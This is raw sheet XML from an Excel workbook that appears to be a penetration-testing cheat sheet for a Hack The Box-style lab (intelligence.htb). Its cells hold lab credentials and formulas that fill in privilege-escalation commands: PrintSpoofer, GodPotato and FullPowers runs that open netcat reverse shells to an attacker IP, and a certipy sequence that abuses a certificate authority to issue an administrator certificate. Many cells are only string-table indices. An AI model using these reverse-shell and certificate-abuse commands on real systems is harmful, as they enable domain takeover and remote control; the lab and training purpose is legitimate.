  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="1" width="9" style="3"/>
    <col min="2" max="2" width="53.375" style="3" customWidth="1"/>
    <col min="3" max="3" width="24.75" style="3" customWidth="1"/>
    <col min="4" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:9">
      <c r="B2" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="2:9">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="7" spans="2:9">
      <c r="B7" s="4" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="3" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="3" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="10" spans="2:9">
      <c r="B10" s="3" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="12" spans="2:9">
      <c r="B12" s="4" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="3" t="str">
        <f>".\"&amp;'101. ExploitTools'!B15&amp;" -i -c powershell.exe"</f>
        <v>.\PrintSpoofer64.exe -i -c powershell.exe</v>
      </c>
    </row>
    <row r="14" spans="2:9">
      <c r="B14" s="3" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="15" spans="2:9">
      <c r="B15" s="3" t="str">
        <f>".\GodPotato-NET4.exe -cmd 'nc64.exe -t -e C:\Windows\System32\cmd.exe "&amp;$C$4&amp;" 443'"</f>
        <v>.\GodPotato-NET4.exe -cmd 'nc64.exe -t -e C:\Windows\System32\cmd.exe 10.10.16.4 443'</v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="3" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="17" spans="2:3">
      <c r="B17" s="3" t="s">
        <v>195</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="18" spans="2:3">
      <c r="B18" s="3" t="s">
        <v>197</v>
      </c>
      <c r="C18" s="29" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="19" spans="2:3">
      <c r="C19" s="29"/>
    </row>
    <row r="20" spans="2:3">
      <c r="B20" s="4" t="s">
        <v>199</v>
      </c>
      <c r="C20" s="29"/>
    </row>
    <row r="21" spans="2:3">
      <c r="B21" s="3" t="str">
        <f>"./FullPowers.exe -c ""nc.exe "&amp;$C$4&amp;" 443 -e cmd"" -z"</f>
        <v>./FullPowers.exe -c "nc.exe 10.10.16.4 443 -e cmd" -z</v>
      </c>
      <c r="C21" s="29"/>
    </row>
    <row r="22" spans="2:3">
      <c r="C22" s="29"/>
    </row>
    <row r="23" spans="2:3">
      <c r="C23" s="29"/>
    </row>
    <row r="24" spans="2:3">
      <c r="B24" s="4" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="25" spans="2:3">
      <c r="B25" s="3" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="26" spans="2:3">
      <c r="B26" s="3" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="27" spans="2:3">
      <c r="B27" s="3" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="28" spans="2:3">
      <c r="B28" s="3" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="29" spans="2:3">
      <c r="B29" s="3" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="30" spans="2:3">
      <c r="B30" s="3" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="31" spans="2:3">
      <c r="B31" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="32" spans="2:3">
      <c r="B32" s="3" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="33" spans="2:2">
      <c r="B33" s="3" t="s">
        <v>209</v>
      </c>
    </row>
    <row r="35" spans="2:2">
      <c r="B35" s="4" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="3" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="37" spans="2:2">
      <c r="B37" s="3" t="s">
        <v>211</v>
      </c>
    </row>
    <row r="38" spans="2:2">
      <c r="B38" s="3" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="3" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="3" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="3" t="s">
        <v>215</v>
      </c>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="3" t="s">
        <v>216</v>
      </c>
    </row>
    <row r="43" spans="2:2">
      <c r="B43" s="3" t="s">
        <v>217</v>
      </c>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="4" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="46" spans="2:2">
      <c r="B46" s="3" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="47" spans="2:2">
      <c r="B47" s="3" t="s">
        <v>220</v>
      </c>
    </row>
    <row r="48" spans="2:2">
      <c r="B48" s="3" t="s">
        <v>221</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="3" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="3" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="3" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="3" t="s">
        <v>224</v>
      </c>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="3" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="4" t="s">
        <v>226</v>
      </c>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="3" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="57" spans="2:2">
      <c r="B57" s="3" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="58" spans="2:2">
      <c r="B58" s="3" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="60" spans="2:2">
      <c r="B60" s="4" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="61" spans="2:2">
      <c r="B61" s="3" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="63" spans="2:2">
      <c r="B63" s="4" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="64" spans="2:2">
      <c r="B64" s="3" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="65" spans="2:2">
      <c r="B65" s="3" t="s">
        <v>234</v>
      </c>
    </row>
    <row r="67" spans="2:2">
      <c r="B67" s="4" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="68" spans="2:2">
      <c r="B68" s="3" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="69" spans="2:2">
      <c r="B69" s="3" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="70" spans="2:2">
      <c r="B70" s="3" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="71" spans="2:2">
      <c r="B71" s="3" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="72" spans="2:2">
      <c r="B72" s="3" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="73" spans="2:2">
      <c r="B73" s="3" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="74" spans="2:2">
      <c r="B74" s="3" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="75" spans="2:2">
      <c r="B75" s="3" t="s">
        <v>243</v>
      </c>
    </row>
    <row r="76" spans="2:2">
      <c r="B76" s="3" t="s">
        <v>244</v>
      </c>
    </row>
    <row r="77" spans="2:2">
      <c r="B77" s="3" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="79" spans="2:2">
      <c r="B79" s="4" t="s">
        <v>246</v>
      </c>
    </row>
    <row r="80" spans="2:2">
      <c r="B80" s="3" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="81" spans="2:3">
      <c r="B81" s="3" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="82" spans="2:3">
      <c r="B82" s="3" t="s">
        <v>249</v>
      </c>
    </row>
    <row r="84" spans="2:3">
      <c r="B84" s="4" t="s">
        <v>226</v>
      </c>
    </row>
    <row r="85" spans="2:3">
      <c r="B85" s="3" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="86" spans="2:3">
      <c r="B86" s="3" t="s">
        <v>250</v>
      </c>
    </row>
    <row r="88" spans="2:3">
      <c r="B88" s="4" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="89" spans="2:3">
      <c r="B89" s="3" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="90" spans="2:3">
      <c r="B90" s="3" t="s">
        <v>253</v>
      </c>
    </row>
    <row r="92" spans="2:3">
      <c r="B92" s="4" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="93" spans="2:3">
      <c r="B93" s="3" t="str">
        <f>"Get-Printer -Name \\"&amp;$C$5&amp;"\hp-mft01(printer name) | Format-List"</f>
        <v>Get-Printer -Name \\10.10.10.248\hp-mft01(printer name) | Format-List</v>
      </c>
    </row>
    <row r="95" spans="2:3">
      <c r="B95" s="4" t="s">
        <v>255</v>
      </c>
      <c r="C95" s="29"/>
    </row>
    <row r="96" spans="2:3">
      <c r="B96" s="3" t="s">
        <v>256</v>
      </c>
      <c r="C96" s="29"/>
    </row>
    <row r="97" spans="2:3">
      <c r="B97" s="2" t="str">
        <f>"certipy ca -ca 'manager-DC01-CA' -add-officer "&amp;$F$4&amp;" -username "&amp;$F$4&amp;"@"&amp;$F$5&amp;" -password "&amp;$I$4</f>
        <v>certipy ca -ca 'manager-DC01-CA' -add-officer Tiffany.Molina -username Tiffany.Molina@intelligence.htb -password 'NewIntelligenceCorpUser9876'</v>
      </c>
      <c r="C97" s="29"/>
    </row>
    <row r="98" spans="2:3">
      <c r="B98" s="2" t="str">
        <f>"certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username "&amp;$F$4&amp;"@"&amp;$F$5&amp;" -password "&amp;$I$4</f>
        <v>certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username Tiffany.Molina@intelligence.htb -password 'NewIntelligenceCorpUser9876'</v>
      </c>
      <c r="C98" s="29"/>
    </row>
    <row r="99" spans="2:3">
      <c r="B99" s="2" t="str">
        <f>"certipy req -username "&amp;$F$4&amp;"@"&amp;$F$5&amp;" -password "&amp;$I$4&amp;" -ca manager-DC01-CA -target "&amp;$F$5&amp;" -template SubCA -upn administrator@"&amp;$F$5</f>
        <v>certipy req -username Tiffany.Molina@intelligence.htb -password 'NewIntelligenceCorpUser9876' -ca manager-DC01-CA -target intelligence.htb -template SubCA -upn administrator@intelligence.htb</v>
      </c>
      <c r="C99" s="29"/>
    </row>
    <row r="100" spans="2:3">
      <c r="B100" s="2" t="str">
        <f>"certipy ca -ca 'manager-DC01-CA' -issue-request 785 -username "&amp;$F$4&amp;"@"&amp;$F$5&amp;" -password "&amp;$I$4</f>
        <v>certipy ca -ca 'manager-DC01-CA' -issue-request 785 -username Tiffany.Molina@intelligence.htb -password 'NewIntelligenceCorpUser9876'</v>
      </c>
      <c r="C100" s="29"/>
    </row>
    <row r="101" spans="2:3">
      <c r="B101" s="2" t="str">
        <f>"certipy req -username "&amp;$F$4&amp;"@"&amp;$F$5&amp;" -password "&amp;$I$4&amp;" -ca manager-DC01-CA -target "&amp;$F$5&amp;" -retrieve 785"</f>
        <v>certipy req -username Tiffany.Molina@intelligence.htb -password 'NewIntelligenceCorpUser9876' -ca manager-DC01-CA -target intelligence.htb -retrieve 785</v>
      </c>
      <c r="C101" s="29"/>
    </row>
    <row r="102" spans="2:3">
      <c r="B102" s="2" t="str">
        <f>"certipy auth -pfx administrator.pfx -dc-ip "&amp;$C$5</f>
        <v>certipy auth -pfx administrator.pfx -dc-ip 10.10.10.248</v>
      </c>
      <c r="C102" s="29"/>
    </row>
    <row r="103" spans="2:3">
      <c r="C103" s="29"/>
    </row>
    <row r="104" spans="2:3">
      <c r="B104" s="4" t="s">
        <v>257</v>
      </c>
      <c r="C104" s="29"/>
    </row>
    <row r="105" spans="2:3">
      <c r="B105" s="3" t="str">
        <f>"sudo ntpdate -u "&amp;$F$5</f>
        <v>sudo ntpdate -u intelligence.htb</v>
      </c>
      <c r="C105" s="29"/>
    </row>
    <row r="106" spans="2:3">
      <c r="B106" s="3" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="108" spans="2:3">
      <c r="B108" s="4" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="110" spans="2:3">
      <c r="B110" s="3" t="s">
        <v>260</v>
      </c>
    </row>
    <row r="111" spans="2:3">
      <c r="B111" s="3" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="112" spans="2:3">
      <c r="B112" s="3" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="113" spans="2:2">
      <c r="B113" s="3" t="s">
        <v>262</v>
      </c>
    </row>
    <row r="114" spans="2:2">
      <c r="B114" s="3" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="115" spans="2:2" ht="19.5">
      <c r="B115" s="11" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="116" spans="2:2">
      <c r="B116" s="3" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="117" spans="2:2">
      <c r="B117" s="3" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="118" spans="2:2">
      <c r="B118" s="3" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="119" spans="2:2">
      <c r="B119" s="3" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="120" spans="2:2">
      <c r="B120" s="3" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="121" spans="2:2">
      <c r="B121" s="3" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="122" spans="2:2">
      <c r="B122" s="3" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="123" spans="2:2">
      <c r="B123" s="3" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="124" spans="2:2">
      <c r="B124" s="3" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="125" spans="2:2">
      <c r="B125" s="3" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="126" spans="2:2">
      <c r="B126" s="3" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="127" spans="2:2">
      <c r="B127" s="3" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="128" spans="2:2">
      <c r="B128" s="3" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="129" spans="2:2">
      <c r="B129" s="3" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="130" spans="2:2">
      <c r="B130" s="3" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="131" spans="2:2">
      <c r="B131" s="3" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="132" spans="2:2">
      <c r="B132" s="3" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="133" spans="2:2">
      <c r="B133" s="3" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="134" spans="2:2">
      <c r="B134" s="3" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="135" spans="2:2">
      <c r="B135" s="3" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="136" spans="2:2">
      <c r="B136" s="3" t="s">
        <v>285</v>
      </c>
    </row>
    <row r="140" spans="2:2">
      <c r="B140" s="3" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="141" spans="2:2">
      <c r="B141" s="3" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="142" spans="2:2">
      <c r="B142" s="3" t="s">
        <v>288</v>
      </c>
    </row>
    <row r="143" spans="2:2">
      <c r="B143" s="3" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="144" spans="2:2">
      <c r="B144" s="3" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="145" spans="2:2">
      <c r="B145" s="3" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="146" spans="2:2">
      <c r="B146" s="3" t="s">
        <v>291</v>
      </c>
    </row>
    <row r="147" spans="2:2">
      <c r="B147" s="3" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="148" spans="2:2">
      <c r="B148" s="3" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="151" spans="2:2">
      <c r="B151" s="4" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="152" spans="2:2">
      <c r="B152" s="3" t="s">
        <v>295</v>
      </c>
    </row>
    <row r="153" spans="2:2">
      <c r="B153" s="3" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="154" spans="2:2">
      <c r="B154" s="3" t="s">
        <v>297</v>
      </c>
    </row>
    <row r="156" spans="2:2">
      <c r="B156" s="4" t="s">
        <v>298</v>
      </c>
    </row>
    <row r="157" spans="2:2" ht="19.5">
      <c r="B157" s="11" t="s">
        <v>299</v>
      </c>
    </row>
    <row r="158" spans="2:2" ht="19.5">
      <c r="B158" s="11" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="159" spans="2:2" ht="19.5">
      <c r="B159" s="11" t="s">
        <v>301</v>
      </c>
    </row>
    <row r="160" spans="2:2">
      <c r="B160" s="3" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="161" spans="2:2">
      <c r="B161" s="3" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="163" spans="2:2">
      <c r="B163" s="4" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="164" spans="2:2">
      <c r="B164" s="3" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="165" spans="2:2">
      <c r="B165" s="3" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="167" spans="2:2">
      <c r="B167" s="4" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="168" spans="2:2">
      <c r="B168" s="3" t="s">
        <v>307</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="C18" r:id="rId1" xr:uid="{77CC3EC1-1297-458F-906B-E10228BF8E7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1525-4C34-4225-AAF8-EBDE1CDCAB5A}">
  <dimension ref="B4:I23"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="H4" sqref="H4:I4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="4" spans="2:9">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="7" spans="2:9">
      <c r="B7" s="4" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="3" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="3" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="11" spans="2:9">
      <c r="B11" s="4" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="12" spans="2:9">
      <c r="B12" s="3" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="3" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="14" spans="2:9">
      <c r="B14" s="3" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="4" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="3" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="3" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="3" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="4" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="3" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="3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2023-04-30T14:03:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-28T05:42:02Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>